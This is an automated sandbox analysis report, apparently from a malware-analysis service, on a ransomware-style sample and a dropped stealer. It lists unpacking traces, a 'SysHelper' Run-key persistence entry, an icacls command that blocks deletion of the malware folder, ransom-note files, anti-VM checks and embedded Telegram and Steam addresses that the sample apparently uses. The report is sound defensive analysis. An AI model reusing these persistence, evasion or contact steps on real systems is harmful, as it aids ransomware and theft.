          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\ source: E0tabE4K4r.exe, 00000006.00000003.1820362877.0000000003199000.00000004.00000020.00020000.00000000.sdmp, E0tabE4K4r.exe, 00000006.00000003.1819729818.0000000003197000.00000004.00000020.00020000.00000000.sdmp, E0tabE4K4r.exe, 00000006.00000003.1763426037.000000000317E000.00000004.00000020.00020000.00000000.sdmp, E0tabE4K4r.exe, 00000006.00000003.1763857201.0000000003188000.00000004.00000020.00020000.00000000.sdmp, E0tabE4K4r.exe, 00000006.00000003.1819425961.0000000003169000.00000004.00000020.00020000.00000000.sdmp, E0tabE4K4r.exe, 00000006.00000003.1853284820.0000000003192000.00000004.00000020.00020000.00000000.sdmp, E0tabE4K4r.exe, 00000006.00000003.1852996109.0000000003136000.00000004.00000020.00020000.00000000.sdmp, E0tabE4K4r.exe, 00000006.00000003.1853232093.000000000313E000.00000004.00000020.00020000.00000000.sdmp, E0tabE4K4r.exe, 00000006.00000003.1839267370.000000000319D000.00000004.00000020.00020000.00000000.sdmp, E0tabE4K4r.exe, 00000006.00000003.1818903237.0000000003136000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\\ source: E0tabE4K4r.exe, 00000006.00000003.1888230622.00000000039E4000.00000004.00000020.00020000.00000000.sdmp, E0tabE4K4r.exe, 00000006.00000003.1889328606.00000000039E4000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\$< source: E0tabE4K4r.exe, 00000006.00000003.1930135504.0000000003994000.00000004.00000020.00020000.00000000.sdmp, E0tabE4K4r.exe, 00000006.00000003.1930586659.0000000003994000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\47\ source: E0tabE4K4r.exe, 00000006.00000003.1887764284.00000000036DF000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\ing\\>MbvH source: E0tabE4K4r.exe, 00000006.00000003.1840067885.000000000377D000.00000004.00000020.00020000.00000000.sdmp, E0tabE4K4r.exe, 00000006.00000003.1852901443.000000000378E000.00000004.00000020.00020000.00000000.sdmp, E0tabE4K4r.exe, 00000006.00000003.1852217055.000000000370D000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: EXCEntkrnlmp.pdbl.GovernedChannelStates.json source: E0tabE4K4r.exe, 00000006.00000003.1764092521.0000000003115000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.errore\AppCache133409776161022105.txttxtc! source: E0tabE4K4r.exe, 00000006.00000003.1763817024.0000000003147000.00000004.00000020.00020000.00000000.sdmp, E0tabE4K4r.exe, 00000006.00000003.1763893002.000000000314B000.00000004.00000020.00020000.00000000.sdmp, E0tabE4K4r.exe, 00000006.00000003.1765255772.000000000314C000.00000004.00000020.00020000.00000000.sdmp, E0tabE4K4r.exe, 00000006.00000003.1763606123.000000000312C000.00000004.00000020.00020000.00000000.sdmp, E0tabE4K4r.exe, 00000006.00000003.1763564795.0000000003129000.00000004.00000020.00020000.00000000.sdmp, E0tabE4K4r.exe, 00000006.00000003.1763646990.0000000003138000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\ source: E0tabE4K4r.exe, 00000006.00000003.1899749395.0000000003B2D000.00000004.00000020.00020000.00000000.sdmp, E0tabE4K4r.exe, 00000006.00000003.1900876731.0000000003960000.00000004.00000020.00020000.00000000.sdmp, E0tabE4K4r.exe, 00000006.00000003.1923741980.0000000003AE1000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\DB\ source: E0tabE4K4r.exe, 00000006.00000003.1852901443.000000000378E000.00000004.00000020.00020000.00000000.sdmp, E0tabE4K4r.exe, 00000006.00000003.1852217055.000000000370D000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\} source: E0tabE4K4r.exe, 00000006.00000003.1819763925.00000000035E0000.00000004.00000020.00020000.00000000.sdmp, E0tabE4K4r.exe, 00000006.00000003.1763103396.00000000035DC000.00000004.00000020.00020000.00000000.sdmp, E0tabE4K4r.exe, 00000006.00000003.1819912716.00000000035EB000.00000004.00000020.00020000.00000000.sdmp, E0tabE4K4r.exe, 00000006.00000003.1763722153.00000000035E7000.00000004.00000020.00020000.00000000.sdmp, E0tabE4K4r.exe, 00000006.00000003.1765648554.00000000035EB000.00000004.00000020.00020000.00000000.sdmp, E0tabE4K4r.exe, 00000006.00000003.1820389653.00000000035EC000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\920\ttingK source: E0tabE4K4r.exe, 00000006.00000002.1933769256.0000000003159000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\\: source: E0tabE4K4r.exe, 00000006.00000003.1893459042.00000000039DD000.00000004.00000020.00020000.00000000.sdmp, E0tabE4K4r.exe, 00000006.00000003.1899749395.00000000039EC000.00000004.00000020.00020000.00000000.sdmp, E0tabE4K4r.exe, 00000006.00000003.1893613345.00000000039DE000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\ source: E0tabE4K4r.exe, 00000006.00000003.1893459042.0000000003921000.00000004.00000020.00020000.00000000.sdmp, E0tabE4K4r.exe, 00000006.00000003.1887764284.00000000036DF000.00000004.00000020.00020000.00000000.sdmp, E0tabE4K4r.exe, 00000006.00000003.1889475372.0000000003931000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ source: E0tabE4K4r.exe, 00000006.00000003.1872201684.00000000035FD000.00000004.00000020.00020000.00000000.sdmp, E0tabE4K4r.exe, 00000006.00000003.1853107330.00000000035FD000.00000004.00000020.00020000.00000000.sdmp, E0tabE4K4r.exe, 00000006.00000003.1852569222.00000000035D8000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ source: E0tabE4K4r.exe, 00000006.00000003.1820263634.0000000003709000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\ies\0s source: E0tabE4K4r.exe, 00000006.00000003.1901213675.0000000003603000.00000004.00000020.00020000.00000000.sdmp, E0tabE4K4r.exe, 00000006.00000003.1894086061.0000000003603000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\ source: E0tabE4K4r.exe, 00000006.00000003.1854428901.0000000003958000.00000004.00000020.00020000.00000000.sdmp, E0tabE4K4r.exe, 00000006.00000003.1853741689.0000000003951000.00000004.00000020.00020000.00000000.sdmp, E0tabE4K4r.exe, 00000006.00000003.1852759679.00000000039CA000.00000004.00000020.00020000.00000000.sdmp, E0tabE4K4r.exe, 00000006.00000003.1854706372.0000000003961000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\e\ source: E0tabE4K4r.exe, 00000006.00000003.1839468903.0000000003136000.00000004.00000020.00020000.00000000.sdmp, E0tabE4K4r.exe, 00000006.00000003.1852996109.0000000003136000.00000004.00000020.00020000.00000000.sdmp, E0tabE4K4r.exe, 00000006.00000003.1853232093.000000000313E000.00000004.00000020.00020000.00000000.sdmp, E0tabE4K4r.exe, 00000006.00000003.1853430794.0000000003154000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\ source: E0tabE4K4r.exe, 00000006.00000003.1899749395.00000000039EC000.00000004.00000020.00020000.00000000.sdmp, E0tabE4K4r.exe, 00000006.00000003.1894542870.0000000003A9F000.00000004.00000020.00020000.00000000.sdmp, E0tabE4K4r.exe, 00000006.00000003.1893248676.0000000003A9F000.00000004.00000020.00020000.00000000.sdmp, E0tabE4K4r.exe, 00000006.00000003.1900272839.0000000003A35000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\ source: E0tabE4K4r.exe, 00000006.00000003.1765255772.0000000003148000.00000004.00000020.00020000.00000000.sdmp, E0tabE4K4r.exe, 00000006.00000003.1820362877.0000000003199000.00000004.00000020.00020000.00000000.sdmp, E0tabE4K4r.exe, 00000006.00000003.1819729818.0000000003197000.00000004.00000020.00020000.00000000.sdmp, E0tabE4K4r.exe, 00000006.00000003.1763426037.000000000317E000.00000004.00000020.00020000.00000000.sdmp, E0tabE4K4r.exe, 00000006.00000003.1763857201.0000000003188000.00000004.00000020.00020000.00000000.sdmp, E0tabE4K4r.exe, 00000006.00000003.1819425961.0000000003169000.00000004.00000020.00020000.00000000.sdmp, E0tabE4K4r.exe, 00000006.00000003.1763817024.0000000003147000.00000004.00000020.00020000.00000000.sdmp, E0tabE4K4r.exe, 00000006.00000003.1763606123.000000000312C000.00000004.00000020.00020000.00000000.sdmp, E0tabE4K4r.exe, 00000006.00000003.1763564795.0000000003129000.00000004.00000020.00020000.00000000.sdmp, E0tabE4K4r.exe, 00000006.00000003.1839267370.000000000319D000.00000004.00000020.00020000.00000000.sdmp, E0tabE4K4r.exe, 00000006.00000003.1818903237.0000000003136000.00000004.00000020.00020000.00000000.sdmp, E0tabE4K4r.exe, 00000006.00000003.1763646990.0000000003138000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\s\\K source: E0tabE4K4r.exe, 00000006.00000003.1871477613.000000000374A000.00000004.00000020.00020000.00000000.sdmp, E0tabE4K4r.exe, 00000006.00000003.1872238803.00000000037AE000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\D.(z source: E0tabE4K4r.exe, 00000006.00000003.1899749395.00000000039EC000.00000004.00000020.00020000.00000000.sdmp, E0tabE4K4r.exe, 00000006.00000003.1894542870.0000000003A9F000.00000004.00000020.00020000.00000000.sdmp, E0tabE4K4r.exe, 00000006.00000003.1893248676.0000000003A9F000.00000004.00000020.00020000.00000000.sdmp, E0tabE4K4r.exe, 00000006.00000003.1900272839.0000000003A35000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\ source: E0tabE4K4r.exe, 00000006.00000003.1765480086.0000000003139000.00000004.00000020.00020000.00000000.sdmp, E0tabE4K4r.exe, 00000006.00000003.1588022675.0000000003136000.00000004.00000020.00020000.00000000.sdmp, E0tabE4K4r.exe, 00000006.00000003.1763606123.000000000312C000.00000004.00000020.00020000.00000000.sdmp, E0tabE4K4r.exe, 00000006.00000003.1616546391.0000000003115000.00000004.00000020.00020000.00000000.sdmp, E0tabE4K4r.exe, 00000006.00000003.1763564795.0000000003129000.00000004.00000020.00020000.00000000.sdmp, E0tabE4K4r.exe, 00000006.00000003.1587983645.000000000312C000.00000004.00000020.00020000.00000000.sdmp, E0tabE4K4r.exe, 00000006.00000003.1763646990.0000000003138000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\z source: E0tabE4K4r.exe, 00000006.00000003.1924950025.00000000039BD000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\ta\ source: E0tabE4K4r.exe, 00000006.00000003.1871477613.000000000374A000.00000004.00000020.00020000.00000000.sdmp, E0tabE4K4r.exe, 00000006.00000003.1853061569.0000000003745000.00000004.00000020.00020000.00000000.sdmp, E0tabE4K4r.exe, 00000006.00000003.1852217055.000000000370D000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Temp\Symbols\winload_prod.pdb\ source: E0tabE4K4r.exe, 00000006.00000003.1616546391.0000000003115000.00000004.00000020.00020000.00000000.sdmp

          Data Obfuscation

          barindex
          Detected unpacking (changes PE section rights)
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeUnpacked PE file: 2.2.E0tabE4K4r.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.puyihi:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeUnpacked PE file: 6.2.E0tabE4K4r.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.puyihi:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
          Source: C:\Users\user\AppData\Local\1d65c2a7-57e4-4788-a32b-5160ef2f20c8\E0tabE4K4r.exeUnpacked PE file: 13.2.E0tabE4K4r.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.puyihi:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
          Source: C:\Users\user\AppData\Local\83c2bbc7-a37d-4c44-ac37-7b015e6ce1da\build2.exeUnpacked PE file: 15.2.build2.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.tls:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
          Source: C:\Users\user\AppData\Local\1d65c2a7-57e4-4788-a32b-5160ef2f20c8\E0tabE4K4r.exeUnpacked PE file: 17.2.E0tabE4K4r.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.puyihi:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
          Source: C:\Users\user\AppData\Local\1d65c2a7-57e4-4788-a32b-5160ef2f20c8\E0tabE4K4r.exeUnpacked PE file: 20.2.E0tabE4K4r.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.puyihi:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
          Detected unpacking (overwrites its own PE header)
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeUnpacked PE file: 2.2.E0tabE4K4r.exe.400000.0.unpack
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeUnpacked PE file: 6.2.E0tabE4K4r.exe.400000.0.unpack
          Source: C:\Users\user\AppData\Local\1d65c2a7-57e4-4788-a32b-5160ef2f20c8\E0tabE4K4r.exeUnpacked PE file: 13.2.E0tabE4K4r.exe.400000.0.unpack
          Source: C:\Users\user\AppData\Local\83c2bbc7-a37d-4c44-ac37-7b015e6ce1da\build2.exeUnpacked PE file: 15.2.build2.exe.400000.0.unpack
          Source: C:\Users\user\AppData\Local\1d65c2a7-57e4-4788-a32b-5160ef2f20c8\E0tabE4K4r.exeUnpacked PE file: 17.2.E0tabE4K4r.exe.400000.0.unpack
          Source: C:\Users\user\AppData\Local\1d65c2a7-57e4-4788-a32b-5160ef2f20c8\E0tabE4K4r.exeUnpacked PE file: 20.2.E0tabE4K4r.exe.400000.0.unpack
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeCode function: 0_2_00412A43 LoadLibraryA,GetProcAddress,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,0_2_00412A43
          Source: E0tabE4K4r.exeStatic PE information: section name: .puyihi
          Source: E0tabE4K4r.exe.2.drStatic PE information: section name: .puyihi
          Source: sqlite3[1].dll.15.drStatic PE information: section name: /4
          Source: sqlite3[1].dll.15.drStatic PE information: section name: /19
          Source: sqlite3[1].dll.15.drStatic PE information: section name: /31
          Source: sqlite3[1].dll.15.drStatic PE information: section name: /45
          Source: sqlite3[1].dll.15.drStatic PE information: section name: /57
          Source: sqlite3[1].dll.15.drStatic PE information: section name: /70
          Source: sqlite3[1].dll.15.drStatic PE information: section name: /81
          Source: sqlite3[1].dll.15.drStatic PE information: section name: /92
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeCode function: 0_2_0044F19B pushfd ; iretd 0_2_0044F19D
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeCode function: 0_2_004049A9 push ecx; ret 0_2_004049BC
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeCode function: 0_2_0210D0AF push ecx; retf 0_2_0210D0B2
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeCode function: 0_2_02298F05 push ecx; ret 0_2_02298F18
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeCode function: 2_2_00428565 push ecx; ret 2_2_00428578
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeCode function: 2_2_00427B2B pushfd ; retn 004Ch2_2_00427B2C
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeCode function: 5_2_021940AF push ecx; retf 5_2_021940B2
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeCode function: 5_2_02258F05 push ecx; ret 5_2_02258F18
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeCode function: 6_2_0050D050 push eax; retn 004Dh6_2_0050D6B5
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeCode function: 6_2_0050D008 push eax; retn 004Dh6_2_0050D6B5
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeCode function: 6_2_0050D028 push eax; retn 004Dh6_2_0050D6B5
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeCode function: 6_2_0050D090 push eax; retn 004Dh6_2_0050D6B5
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeCode function: 6_2_0050D0A8 push eax; retn 004Dh6_2_0050D6B5
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeCode function: 6_2_0050D318 push eax; retn 004Dh6_2_0050D6B5
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeCode function: 6_2_0050C4E0 push eax; retn 004Dh6_2_0050D6B5
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeCode function: 6_2_0050D550 push eax; retn 004Dh6_2_0050D6B5
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeCode function: 6_2_00428565 push ecx; ret 6_2_00428578
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeCode function: 6_2_0050D698 push eax; retn 004Dh6_2_0050D6B5
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeCode function: 6_2_0050C960 push eax; retn 004Dh6_2_0050D6B5
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeCode function: 6_2_0050C928 push eax; retn 004Dh6_2_0050D6B5
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeCode function: 6_2_0050C988 push eax; retn 004Dh6_2_0050D6B5
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeCode function: 6_2_0050C9A8 push eax; retn 004Dh6_2_0050D6B5
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeCode function: 6_2_0050CB78 push eax; retn 004Dh6_2_0050D6B5
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeCode function: 6_2_00427B2B pushfd ; retn 004Ch6_2_00427B2C
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeCode function: 6_2_0050CD60 push eax; retn 004Dh6_2_0050D6B5
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeCode function: 6_2_0050CDF0 push eax; retn 004Dh6_2_0050D6B5
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeCode function: 6_2_0050CE58 push eax; retn 004Dh6_2_0050D6B5
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeCode function: 6_2_0050CF28 push eax; retn 004Dh6_2_0050D6B5
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeCode function: 6_2_0050CFC0 push eax; retn 004Dh6_2_0050D6B5
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeCode function: 6_2_0050CF90 push eax; retn 004Dh6_2_0050D6B5
          Source: initial sampleStatic PE information: section name: .text entropy: 7.913334499786812
          Source: initial sampleStatic PE information: section name: .text entropy: 7.913334499786812
          Source: initial sampleStatic PE information: section name: .text entropy: 7.652702953960109
          Source: initial sampleStatic PE information: section name: .text entropy: 7.652702953960109

          Persistence and Installation Behavior

          barindex
          Infects executable files (exe, dll, sys, html)
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeSystem file written: C:\Users\user\AppData\Local\Temp\chrome.exeJump to behavior
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W9FILL1W\build2[1].exeJump to dropped file
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeFile created: C:\Users\user\AppData\Local\83c2bbc7-a37d-4c44-ac37-7b015e6ce1da\build2.exeJump to dropped file
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeFile created: C:\Users\user\AppData\Local\1d65c2a7-57e4-4788-a32b-5160ef2f20c8\E0tabE4K4r.exeJump to dropped file
          Source: C:\Users\user\AppData\Local\83c2bbc7-a37d-4c44-ac37-7b015e6ce1da\build2.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\DQNVS06W\sqlite3[1].dllJump to dropped file
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeFile created: C:\_readme.txtJump to behavior
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeFile created: C:\$WinREAgent\_readme.txtJump to behavior
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeFile created: C:\$WinREAgent\Scratch\_readme.txtJump to behavior
          Source: C:\Users\user\AppData\Local\1d65c2a7-57e4-4788-a32b-5160ef2f20c8\E0tabE4K4r.exeFile created: C:\_readme.txtJump to behavior
          Source: C:\Users\user\AppData\Local\1d65c2a7-57e4-4788-a32b-5160ef2f20c8\E0tabE4K4r.exeFile created: C:\Users\user\_readme.txtJump to behavior
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run SysHelperJump to behavior
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run SysHelperJump to behavior
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeCode function: 2_2_00481920 GetVersionExA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,FreeLibrary,GetProcAddress,GetProcAddress,GetProcAddress,FreeLibrary,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,FreeLibrary,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetTickCount,GetTickCount,GetTickCount,GetTickCount,GetTickCount,GetTickCount,GetTickCount,GetTickCount,GetTickCount,GetTickCount,CloseHandle,FreeLibrary,GlobalMemoryStatus,GetCurrentProcessId,2_2_00481920
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
          Source: C:\Users\user\AppData\Local\1d65c2a7-57e4-4788-a32b-5160ef2f20c8\E0tabE4K4r.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
          Source: C:\Users\user\AppData\Local\83c2bbc7-a37d-4c44-ac37-7b015e6ce1da\build2.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate
          Source: C:\Users\user\AppData\Local\83c2bbc7-a37d-4c44-ac37-7b015e6ce1da\build2.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeProcess created: C:\Windows\SysWOW64\icacls.exe icacls "C:\Users\user\AppData\Local\1d65c2a7-57e4-4788-a32b-5160ef2f20c8" /deny *S-1-1-0:(OI)(CI)(DE,DC)
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\83c2bbc7-a37d-4c44-ac37-7b015e6ce1da\build2.exeProcess information set: NOOPENFILEERRORBOX

          Malware Analysis System Evasion

          barindex
          Yara detected AntiVM3
          Source: Yara matchFile source: Process Memory Space: build2.exe PID: 7480, type: MEMORYSTR
          Found stalling execution ending in API Sleep call
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeStalling execution: Execution stalls by calling Sleepgraph_6-44276
          Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
          Source: build2.exe, 0000000F.00000002.2485318072.0000000000400000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: @CMDVRT64.DLLCMDVRT32.DLLWPESPY.DLLVMCHECK.DLLPSTOREC.DLLDIR_WATCH.DLLAPI_LOG.DLLSBIEDLL.DLLSNXHK.DLLAVGHOOKA.DLLAVGHOOKX.DLL...\*.*\7.32B42C548F42FDA81B4A288299BD7F129HTTPS://T.ME/BG3GOTYMEDVSMOZILLA/5.0 (X11; UBUNTU; LINUX X86_64; RV:109.0) GECKO/20100101 FIREFOX/112.0 UACQHTTPS://STEAMCOMMUNITY.COM/PROFILES/76561199601319247HELLOWFQY12O5J6NR.$V
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeCode function: 0_2_0210B71C rdtsc 0_2_0210B71C
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeCode function: 6_2_00481920 GetVersionExA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,NetStatisticsGet,NetStatisticsGet,FreeLibrary,GetProcAddress,GetProcAddress,GetProcAddress,FreeLibrary,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,FreeLibrary,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,CreateToolhelp32Snapshot,GetTickCount,Heap32ListFirst,Heap32First,Heap32Next,GetTickCount,Heap32ListNext,GetTickCount,GetTickCount,GetTickCount,Process32First,GetTickCount,GetTickCount,GetTickCount,GetTickCount,GetTickCount,CloseHandle,FreeLibrary,GlobalMemoryStatus,GetCurrentProcessId,6_2_00481920
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeCode function: _malloc,_malloc,_wprintf,_free,GetAdaptersInfo,_free,_malloc,GetAdaptersInfo,_sprintf,_wprintf,_wprintf,_free,2_2_0040E670
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeCode function: _malloc,_malloc,_wprintf,_free,GetAdaptersInfo,_free,_malloc,GetAdaptersInfo,_sprintf,_wprintf,_wprintf,_free,6_2_0040E670
          Source: C:\Users\user\Desktop\E0tabE4K4r.exeThread delayed: delay time: 700000Jump to behavior
          Source: C:\Users\user\AppData\Local\83c2bbc7-a37d-4c44-ac37-7b015e6ce1da\build2.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\DQNVS06W\sqlite3[1].dllJump to dropped file
